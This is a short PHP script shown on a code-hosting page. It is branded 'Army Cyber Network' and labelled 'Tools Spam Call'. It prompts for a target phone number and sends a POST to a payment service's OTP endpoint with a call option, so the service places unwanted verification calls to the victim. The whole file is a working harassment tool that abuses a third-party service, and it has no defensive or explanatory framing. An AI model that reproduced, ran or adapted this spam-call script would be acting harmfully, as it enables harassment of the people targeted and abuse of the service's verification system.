-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtelp.php
35 lines (35 loc) · 1.21 KB
/
telp.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
function send($phone){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www.tokocash.com/oauth/otp"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "msisdn=$phone&accept=call"); $asw = curl_exec($ch);
curl_close($ch);
echo $asw."\n";
}
menu:
system($bersih);
$green = "\e[92m";
$red = "\e[91m";
$yellow = "\e[93m";
$blue = "\e[36m";
echo $red."
╦╔═┌─┐┌┐┌┌─┐ ╔═╗┌─┐┌─┐┌┬┐
╠╩╗├─┤││││ ┬ ╚═╗├─┘├─┤│││
╩ ╩┴ ┴┘└┘└─┘ ╚═╝┴ ┴ ┴┴ ┴\n";
echo $green."
==============================
|[!] Army Cyber Network [!]|
==============================\n";
echo "\n";
echo "Tools Spam Call\n";
echo $red."
Codec By MryM\n";
echo "Nomor Target\nMasukan : ";
$nomor = trim(fgets(STDIN));
$execute = send($nomor);
print $execute;
?>